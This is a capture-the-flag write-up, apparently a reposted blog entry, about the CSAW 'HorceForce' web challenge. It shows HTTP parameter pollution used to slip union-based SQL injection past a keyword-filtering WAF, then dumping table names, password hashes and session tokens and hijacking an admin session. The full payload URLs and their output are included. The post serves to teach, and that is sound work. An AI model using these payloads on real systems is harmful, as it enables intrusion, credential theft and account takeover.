By Danux Mitnick
Last week I was invited to join a team to participate in a CTF (Capture The Flag) contest organized by CSAW Team. With my wife and kids around, I only had the opportunity to pick one challenge related to Web Exploitation named: "HorceForce" worth 300 points! Basically, you were provided with a low-privilege account and needed to find your way to get Administrator access. So, there are multiple resources explaining how to exploit it, but definitely I want to share my experience. After sending some single quotes it was easy to find a SQL Injection bug by getting the well known "MySQL SQL Error Message". So, as you all know the first attempt was something like: http://128.238.66.217/horse.php?id=7 or 1 IN (select current_user) And I got I ERROR Message saying something like "PLEASE STOP trying to hack this blablablabla site". Then after many techniques to bypass the filter I realized the WAF was configured to deny any string containing either "select" or "union", blindly I assumed the WAF's regular expression was something like: /^.*select.*$/ or /^.*union.*$/ Which means, every string which even makes no sense from SQLi point of view like: blablaSELECTblabla or a bypass technique like:/*!union*/ , were triggering the Warning Message. After some research I found the HTTP Pollution technique which basically allows the attacker (among other things) to play with the GET Parameters in order to confuse the WAF filter. So, how it works? Let's say you have the GET parameter "id", you can duplicate it (or even add it many times) and send something like: ?id=value1&id=value2 And, depending on the Framework used ( PHP , Java , ASP.NET, etc) the parameters are going to be parsed differently, in our case with Apache/PHP, if you inject the same parameter multiple times, only the last one will be parsed by the Framework (see table below) but guess what? Only the first parameter is going to be analyzed by the WAF! This means, by injecting: ?id=7&id=[SQLi] WAF Network Layer parses id=7 <- Good to go! PHP Application Layer parses id= [SQLi] <- SQLi successfully injected So, this is a typical example where you can inject something that is going to be treated differently at Network Layer and Application Layer. Below is a table where you can find how other Frameworks react when receiving the same parameter multiple times. Like ASP.NET, if it receives two parameters, it will concatenate them, and therefore you can split the attack into those fields to bypass the WAF, which is out of scope of this blog.
So, then my next try was to inject something like: 128.238.66.217/horse.php?id=0&id=7%20union%20select%201,2,3,current_user You can notice, all the injection is taking place in the second parameter, which is not being parsed by the WAF and voila!!! I got my first successful response: csaw_chal1@localhost After that, all is simple SQLi to enumerate tables: 128.238.66.217/horse.php?id=0&id=7%20union%20select%20table_name,2,3,4%20from%20information_schema.tables%20limit%201 horses sessions users Then get fields from table users: 128.238.66.217/horse.php?id=0&id=7 union select 1,2,3,column_name from information_schema.columns where table_name='users' limit 200 Description: user_id Description: username Description: password Description: name Description: level And then dump the username and password trying to identify the Administrator password: Description: administrator Pass: $2a$08$kF9H1vqa.fogHc2JwbFNweay.sgdksbiuB9f7MN5mNZgcG6y7BrFG Description: michael_vick Pass: $2a$08$B2fI59Zzph61LajSSgkoB.i0YJ9HH8wBobmExxqPxl/.0Zu3Tijm2 Description: csaw_challenger Pass: $2a$08$zFI9j/fsHKKbV0UCiavNveEIIi./v8lsqiaKxTV3T3BkrBk4XvSEK Description: beefsister33 $2a$08$AUAeUut7FjkdCMfQJUuJwulgnBLbbTc0F/njHbl3mn59IS6OyADbO Description: nuclear_grandma $2a$08$edsWdwf45DDC4Vb2VPiikOspNpr3ePS5VE7z3aYsuMEZyodbkHRDK Description: teabag_swag Pass: $2a$08$uN4sFJ73Quf/b5hC3GxXIO53ewJ0W71c2Vuh4f2x.pr3iTrChvNOK But unfortunately, those passwords were encrypted, but if you remember, there was a table named "sessions", so let's dump its content: 128.238.66.217/horse.php?id=0&id=7%20union%20select%201,2,3,session%20from%20sessions%20limit%20200 Description: bsv30irdq0PCvJxJrCAxROcmdXaUiwgQtPeg5J75EYgrH8jyHQ Description: hbpnEGKo2WeLvQuQL0kb8vyyOHMn96ZYAROXmBggB6Pdr0FX4p Description: VnRu2Zcv7REYTgHOqafggyYn3hA3cq1D9B4u4IxEcnB0TgPT4j Description: UkOAVJ4ZAuX1t0Hib4maJccftZVeC4TdCZ8WxhQJZKqQ9axbwc Description: 4gNszBZeSDjjKE5sSJwIcPOzTvhM90IR9JrqPa286tLfiDNDyp Description: hmmJU3LrcIO7yJ77aSOsL9YIEjKITkOLg1CE0HF6Cnsbv2J077 Description: SL2v2sJvyu7Xw5Lc5b8UBSNFGOFhMfFrCWsgNGZZBSBfazpTlX Then, you just go to your browser, use an Add-on like "Cookies Manager" from Firefox and change your current session value with one of the ones found above and ..... we got the Admin session: bsv30irdq0PCvJxJrCAxROcmdXaUiwgQtPeg5J75EYgrH8jyHQ Which give us the precious key:
查看更多关于通过HTTP Parameter Pollution绕过WAF - 网站安全 - 自学的详细内容...